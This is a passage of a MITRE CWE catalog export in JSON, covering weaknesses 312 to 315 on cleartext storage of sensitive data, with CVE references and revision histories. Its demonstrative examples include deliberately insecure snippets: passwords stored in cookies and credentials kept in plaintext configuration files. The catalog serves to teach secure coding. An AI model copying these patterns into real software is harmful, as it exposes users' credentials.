Data&#34; Page 299"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 17: Failure to Protect Stored Data.&#34; Page 253"}},{"attr":{"@_External_Reference_ID":"REF-265"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Encryption&#34;, Page 43"}},{"attr":{"@_External_Reference_ID":"REF-267"}}]},"Notes":{"Note":{"#text":"There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Encrypt Data","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Encrypt Sensitive Data","attr":{"@_Date":"2010-02-16"}}]}},"312":{"attr":{"@_ID":"312","@_Name":"Cleartext Storage of Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere.","Extended_Description":"Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"922","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker with access to the system could read sensitive information stored in cleartext."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-44"},"Intro_Text":"The following code excerpt stores a plaintext user account ID in a browser cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addCookie( new Cookie(\\"userAccountID\\", acctID);"},"Body_Text":"Because the account ID is in plaintext, the user\'s account information is exposed if their computer is compromised by an attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-40"},"Intro_Text":"This code writes a user\'s login information to a cookie so the user does not have to login again later.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function persistLogin($username, $password){}","xhtml:div":{"#text":"$data = array(\\"username\\" =&gt; $username, \\"password\\"=&gt; $password);setcookie (\\"userdata\\", $data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["The code stores the user\'s username and password in plaintext in a cookie on the user\'s machine. This exposes the user\'s login information if their computer is compromised by an attacker. Even if the user\'s machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie.","Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-41"},"Intro_Text":"The following code attempts to establish a connection, read in a password, then store it to a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error(\\"Unknown host\\");memcpy( (char *)&amp;server.sin_addr,(char *)hp-&gt;h_addr,hp-&gt;h_length);if (argc &lt; 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&amp;server, sizeof server) &lt; 0) error(\\"Connecting\\");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) {","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"write(dfd,password_buffer,n);...","xhtml:br":["","",""]}}}},"Body_Text":"While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2272","Description":"password and username stored in cleartext in a cookie","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272"},{"Reference":"CVE-2009-1466","Description":"password stored in cleartext in a file with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466"},{"Reference":"CVE-2009-0152","Description":"chat program disables SSL in some circumstances even when the user says to use SSL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152"},{"Reference":"CVE-2009-1603","Description":"Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603"},{"Reference":"CVE-2009-0964","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964"},{"Reference":"CVE-2008-6157","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157"},{"Reference":"CVE-2008-6828","Description":"product stores a password in cleartext in memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828"},{"Reference":"CVE-2008-1567","Description":"storage of a secret key in cleartext in a temporary file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567"},{"Reference":"CVE-2008-0174","Description":"SCADA product uses HTTP Basic Authentication, which is not encrypted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174"},{"Reference":"CVE-2007-5778","Description":"login credentials stored unencrypted in a registry key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778"},{"Reference":"CVE-2001-1481","Description":"Plaintext credentials in world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481"},{"Reference":"CVE-2005-1828","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828"},{"Reference":"CVE-2005-2209","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209"},{"Reference":"CVE-2002-1696","Description":"Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696"},{"Reference":"CVE-2004-2397","Description":"Plaintext storage of private key and passphrase in log file when user imports the key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397"},{"Reference":"CVE-2002-1800","Description":"Admin password in plaintext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800"},{"Reference":"CVE-2001-1537","Description":"Default configuration has cleartext usernames/passwords in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537"},{"Reference":"CVE-2001-1536","Description":"Usernames/passwords in cleartext in cookies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536"},{"Reference":"CVE-2005-2160","Description":"Authentication information stored in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage of Sensitive Information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Protecting Secret Data&#34; Page 299"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Encryption&#34;, Page 43"}},{"attr":{"@_External_Reference_ID":"REF-172"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-23","Modification_Comment":"updated Abstraction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Plaintext Storage of Sensitive Information","attr":{"@_Date":"2009-01-12"}}}},"313":{"attr":{"@_ID":"313","@_Name":"Cleartext Storage in a File or on Disk","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in a file, or on disk.","Extended_Description":"The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1481","Description":"Cleartext credentials in world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481"},{"Reference":"CVE-2005-1828","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828"},{"Reference":"CVE-2005-2209","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209"},{"Reference":"CVE-2002-1696","Description":"Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696"},{"Reference":"CVE-2004-2397","Description":"Cleartext storage of private key and passphrase in log file when user imports the key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in File or on Disk"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in File or on Disk","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in a File or on Disk","attr":{"@_Date":"2013-07-17"}}]}},"314":{"attr":{"@_ID":"314","@_Name":"Cleartext Storage in the Registry","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in the registry.","Extended_Description":"Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2227","Description":"Cleartext passwords in registry key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2227"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Registry"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in Registry","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in the Registry","attr":{"@_Date":"2013-07-17"}}]}},"315":{"attr":{"@_ID":"315","@_Name":"Cleartext Storage of Sensitive Information in a Cookie","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in a cookie.","Extended_Description":"Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-44"},"Intro_Text":"The following code excerpt stores a plaintext user account ID in a browser cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addCookie( new Cookie(\\"userAccountID\\", acctID);"},"Body_Text":"Because the account ID is in plaintext, the user\'s account information is exposed if their computer is compromised by an attacker."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1800","Description":"Admin password in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800"},{"Reference":"CVE-2001-1537","Description":"Default configuration has cleartext usernames/passwords in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537"},{"Reference":"CVE-2001-1536","Description":"Usernames/passwords in cleartext in cookies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536"},{"Reference":"CVE-2005-2160","Description":"Authentication information stored in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Cookie"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"74"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in Cookie","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in a 